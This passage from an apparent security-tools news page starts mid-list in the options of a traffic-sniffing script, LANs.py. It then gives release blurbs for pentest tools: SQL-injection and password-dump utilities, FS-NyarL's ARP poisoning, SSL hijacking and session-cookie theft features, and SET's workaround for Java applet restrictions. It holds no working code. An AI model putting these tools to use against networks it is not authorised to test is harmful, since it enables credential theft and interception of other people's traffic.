-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
-pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
-rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
-rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
-v: show verbose URLs which do not truncate at 150 characters like -u
Cleans the following on Ctrl-C:
--Turn off IP forwarding
--Flush iptables firewall
--Individually restore each machine's ARP table

Download LANs.py

[Firefox Password Remover] Firefox Website Login Password Removal Tool

Firefox Password Remover is the free tool to quickly remove the stored website login passwords from Firefox.

You can either remove selected ones or all of the stored passwords from the Firefox sign-on database.

One of the unique feature of this tool is that it allows you to remove the website passwords even if it is protected with Master Password.

In addition to this, you can also generate password report in HTML/XML/TEXT format. This is useful for creating backup before proceeding with deletion of passwords.

Also it supports removal of passwords from different Firefox profiles either on local system or any other system with different Operating system (such as Linux, MAC etc).

This is very handy tool for easily removing your stored passwords on public systems or shared computers. Often it is not good idea to hand over your laptop to someone without clearing your important passwords, mainly Facebook or Google ones.

Firefox Password Remover supports all versions of Firefox including latest version v25.0. It works on both 32bit & 64bit platforms starting from Windows XP to Windows 8.

Download Firefox Password Remover v1.0

[WhiteHat Aviator] The Web’s most secure and private browser

A few weeks have passed and we’ve had an overwhelmingly positive response from the community for the Aviator Beta. As you can probably expect, the vast majority of comments we received were around building a Windows version or a Linux version. But in the mean time, we wanted to make sure we continued iterating on some of the bugs that have floated in. Aviator version 1.2 has the following changes:

• Fixed gate keeper – unidentified developer code signing issue
• Fixed crash issue with Mac version 10.6
• Fixed plugins installation issue (correcting an error in the User Agent)
• Fixed broken images while adding new user in settings page
• Fixed typo issue in the Protected mode message popup
• Permissions fixed to be safer and less permissive

Download WhiteHat Aviator

[Wifislax 4.7 Final] Livecd de Auditorías Wireless

Una vez más nos satisface entregar una nueva versión del livecd de auditorías wireless wifislax. En esta versión 4.7 , el sistema esta construido con paquetes slackware-14.1 que por fin ha visto la luz también. Salimos con kernel 3.10.18 , con ampliación de drivers y como siempre en versiones normal y pae. Los escritorios son kde 4.10.5 del repositorio slackware y xfce 4.11, y configurado para darle un toque diferente acorde a las peticiones de los usuarios.

Como siempre también se dispone de un buen montón de módulos xzm extras con los que ampliar las capacidades del livecd  , hay aplicaciones de todo tipo , editores de video , imagenes , audio , reproductores multimedia , clientes ftp , gestores de descargas..p2p , etc etc etc.

Agradecer a todo el mundo que participa en la sección de desarrollo del livecd , donde se descubren los bugs y se reparan , en la medida de lo posible.... pepe10000 , por los drivers nvidia , y también a alist3r , con quien estuvimos mirando como sortear las dificultades del modo monitor en los nuevos kerneles y de donde nacieron los parches que uso actualmente para corregir el fix cannel -1.

A geminis_demon , que siempre me saca de apuros cuando necesito cosas en bash , a hadrianweb por los constantes respaldos de las isos y módulos y a todo el equipo de seguridadwireless , el que mas y el que menos aporta siempre algo.

VIDEO CON TODOS LOS EXTRAS CARGADOS:

Descarga Wifislax 4.7 Final

Python tools for Pentesters

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them.

Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.

Network

• Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
• pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
• libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
• dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
• Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
• pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
• Dirtbags py-pcap: read pcap files without libpcap
• flowgrep: grep through packet payloads using regular expressions
• Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
• Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
• Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)

Debugging and reverse engineering

• Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
• Immunity Debugger: scriptable GUI and command line debugger
• mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
• IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
• PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
• pefile: read and work with Portable Executable (aka PE) files
• pydasm: Python interface to the libdasm x86 disassembling library
• PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
• uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
• diStorm: disassembler library for AMD64, licensed under the BSD license
• python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
• vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
• Androguard: reverse engineering and analysis of Android applications

Fuzzing

• Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
• Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
• antiparser: fuzz testing and fault injection API
• TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
• untidy: general purpose XML fuzzer
• Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
• SMUDGE
• Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
• Fuzzbox: multi-codec media fuzzer
• Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
• Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
• WSBang: perform automated security testing of SOAP based web services
• Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
• fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
• Fusil: Python library used to write fuzzing programs

Web

• Requests: elegant and simple HTTP library, built for human beings
• HTTPie: human-friendly cURL-like command line HTTP client
• ProxMon: processes proxy logs and reports discovered issues
• WSMap: find web service endpoints and discovery files
• Twill: browse the Web from a command-line interface. Supports automated Web testing
• Ghost.py: webkit web client written in Python
• Windmill: web testing tool designed to let you painlessly automate and debug your web application
• FunkLoad: functional and load web tester
• spynner: Programmatic web browsing module for Python with Javascript/AJAX support
• python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
• mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
• pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers

Forensics

• Volatility: extract digital artifacts from volatile memory (RAM) samples
• LibForensics: library for developing digital forensics applications
• TrIDLib, identify file types from their binary signatures. Now includes Python binding
• aft: Android forensic toolkit

Malware analysis

• pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
• Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
• pyClamAV: add virus detection capabilities to your Python software
• jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
• yara-python: identify and classify malware samples
• phoneyc: pure Python honeyclient implementation

PDF

• Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
• Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
• Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
• pyPDF: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt...
• PDFMiner: extract text from PDF files
• python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

• InlineEgg: toolbox of classes for writing small assembly programs in Python
• Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
• RevHosts: enumerate virtual hosts for a given IP address
• simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
• PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
• Hachoir: view and edit a binary stream field by field
• py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools

Other useful libraries and tools

• IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
• Beautiful Soup: HTML parser optimized for screen-scraping
• matplotlib: make 2D plots of arrays
• Mayavi: 3D scientific data visualization and plotting
• RTGraph3D: create dynamic graphs in 3D
• Twisted: event-driven networking engine
• Suds: lightweight SOAP client for consuming Web Services
• M2Crypto: most complete OpenSSL wrapper
• NetworkX: graph library (edges, nodes)
• Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
• pyparsing: general parsing module
• lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
• Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
• Pexpect: control and automate other programs, similar to Don Libes `Expect` system
• Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
• PyQt and PySide: Python bindings for the Qt application framework and GUI library

Source

[SX Password Dump Suite] Complete Set of Command-line Password Recovery Tools from SecurityXploded

SX Password Dump Suite is the complete collection of all the FREE command-line based password recovery tools from SecurityXploded. 

It contains the latest version of all the password dump tools which makes it easier for the user to get all these tools at one place instead of downloading each of them separately. SX Password Dump Suite includes following universal password recovery tools,

Browser Password Dump Facebook Password Dump Gmail Password Dump Network Password Dump Outlook Password Dump WiFi Password Dump Download SX Password Dump Suite v1.0

[aidSQL] PHP Application For SQL Injection Detection & Exploitation

aidSQL a PHP application provided for detecting security holes in your website/s. It’s a modular application, meaning that you can develop your very own plugins for SQL injection detection & exploitation.

The tool provides pen-testing capabilities for MS-SQL 2000, MySQL 5 and the author promises to add Oracle 10g support – but that doesn’t seem to be happening.

You can view a demo of the app here:

The output from Wavsep for aidSQL can also be seen here:
aidSQL vs Wavsep
Read more here.

Download aidSQL

[Volatility v2.3] The advanced memory forensics framework (Support of OSX)

The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work

• Windows
  • new plugins to parse IE history/index.dat URLs, recover shellbags data, dump cached files (exe/pdf/doc/etc), extract the MBR and MFT records, explore recently unloaded kernel modules, dump SSL private and public keys/certs, and display details on process privileges
  • added plugins to detect poison ivy infections, find and decrypt configurations in memory for poison ivy, zeus v1, zeus v2 and citadelscan 1.3.4.5
  • apihooks detects duqu style instruction modifications (MOV reg32, imm32; JMP reg32)
  • crashinfo displays uptime, systemtime, and dump type (i.e. kernel, complete, etc)
  • psxview plugin adds two new sources of process listings from the GUI APIs
  • screenshots plugin shows text for window titles
  • svcscan automatically queries the cached registry for service dlls
  • dlllist shows load count to distinguish between static and dynamic loaded dlls
• New address spaces
  • added support for VirtualBox ELF64 core dumps, VMware saved state (vmss) and snapshot (vmsn) files, and FDPro’s non-standard HPAK format
  • associated plugins: vboxinfo, vmwareinfo, hpakinfo, hpakextract
• Mac
  • new MachO address space for 32- and 64-bit Mac memory samples
  • over 30+ plugins for Mac memory forensics
• Linux/Android
  • new ARM address space to support memory dumps from Linux and Android devices on ARM
  • added plugins to scan linux process and kernel memory with yara signatures, dump LKMs to disk, and check TTY devices for rootkit hooks
  • added plugins to check the ARM system call and exception vector tables for hooks

Operating Systems

Volatility supports the following operating systems and versions. All Windows profiles are included in the standard Volatility package. You can download sample Linux profiles from the LinuxProfiles wiki page or read LinuxMemoryForensics on how to build your own. You can download a single archive of 38 different Mac OSX profiles or read MacMemoryForensics to build your own.

• Windows
  • 32-bit Windows XP Service Pack 2 and 3
  • 32-bit Windows 2003 Server Service Pack 0, 1, 2
  • 32-bit Windows Vista Service Pack 0, 1, 2
  • 32-bit Windows 2008 Server Service Pack 1, 2
  • 32-bit Windows 7 Service Pack 0, 1
  • 64-bit Windows XP Service Pack 1 and 2
  • 64-bit Windows 2003 Server Service Pack 1 and 2
  • 64-bit Windows Vista Service Pack 0, 1, 2
  • 64-bit Windows 2008 Server Service Pack 1 and 2
  • 64-bit Windows 2008 R2 Server Service Pack 0 and 1
  • 64-bit Windows 7 Service Pack 0 and 1
• Linux
  • 32-bit Linux kernels 2.6.11 to 3.5
  • 64-bit Linux kernels 2.6.11 to 3.5
  • OpenSuSE, Ubuntu, Debian, CentOS, Fedora, Mandriva, etc
• Mac OSX
  • (new) 32-bit 10.5.x Leopard (the only 64-bit 10.5 is Server, which isn’t supported)
  • (new) 32-bit 10.6.x Snow Leopard
  • (new) 64-bit 10.6.x Snow Leopard
  • (new) 32-bit 10.7.x Lion
  • (new) 64-bit 10.7.x Lion
  • (new) 64-bit 10.8.x Mountain Lion (there is no 32-bit version)

Download Volatility v2.3

[FS-NyarL] A network takeover & forensic analysis tool

NyarL it's Nyarlathotep, a mitological chaotic deity of the writer HP. Lovecraft's cosmogony.

It's represent Crawling Chaos and FS-NyarL it's The Crawling Chaos of Cyber Security :-)

A network takeover & forensic analysis tool - useful to advanced PenTest tasks & for fun and profit - but use it at your own risk!

• Interactive Console
• Real Time Passwords Found
• Real Time Hosts Enumeration
• Tuned Injections & Client Side Attacks
• ARP Poisoning & SSL Hijacking
• Automated HTTP Report Generator

ATTACKS IMPLEMENTED: MITM (Arp Poisoning) Sniffing (With & Without Arp Poisoning) SSL Hijacking (Full SSL/TLS Control) HTTP Session Hijaking (Take & Use Session Cookies) Client Browser Takeover (with Filter Injection in data stream) Browser AutoPwn (with Filter Injection in data steam) Evil Java Applet (with Filter Injection in data stream) DNS Spoofing Port Scanning POST ATTACKS DATA OBTAINED: Passwords extracted from data stream Pcap file with whole data stream for deep analysis Session flows extracted from data stream (Xplico & Chaosreader) Files extracted from data stream Hosts enumeration (IP,MAC,OS) URLs extracted from data stream Cookies extracted from data stream Images extracted from data stream List of HTTP files downloaded extracted from URLs

DEPENDENCIES (aka USED TOOLS): Chaosreader (already in bin folder) Xplico Ettercap Arpspoof Arp-scan Mitmproxy Nmap Tcpdump Beef

SET Metasploit Dsniff Macchanger Hamster Ferret P0f Foremost SSLStrip SSLSplit

Download FS-NyarL

[SET v5.4] The Social-Engineer Toolkit "Walkers"

TrustedSec is proud to announce the release of The Social-Engineer Toolkit (SET) v5.4 codename “Walkers”. This version has a significant amount of changes, performance upgrades, bug fixes, and efficiency. This blog post will cover some of the major highlights from Java 7 Update 45 and how to get around the security “enhancements”.

Most importantly, a massive overhaul on how the Java Applet behaves. Most recently, Java released Java 7 Update 45 which made some significant changes on restrictions on how Applets need to behave. First and foremost, there are requirements now to build into the manifest of the applet in order to meet the specifications for the new changes.

As an example of what SET used in the past, html tags were passed that contained dynamic information such as encrypted shellcode, variables, but most importantly, the name of the Applet. For example:

applet name”Whatever you want!”

Download SET v5.4

[Bluelog v1.1.2] Linux Bluetooth scanner

Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It's intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.

While there are many different Bluetooth scanners available, none I found did exactly what I wanted, most seemed focused on pulling down various bits of information from the target devices (like SDP records). I was also having trouble locating a scanner that didn't have a UI of some sort, which was a problem since I wanted to scan continuously without user intervention. After trying out all of the Linux Bluetooth scanners I could find, I eventually decided to simply write my own.

The more time I spent on Bluelog, the more features I worked into it. Eventually, Bluelog started evolving into a considerably more advanced tool then I initially intended. Still, all of the advanced features are completely optional, and if you chose it can still be used as the simple little scanner it started as.

Download Bluelog v1.1.2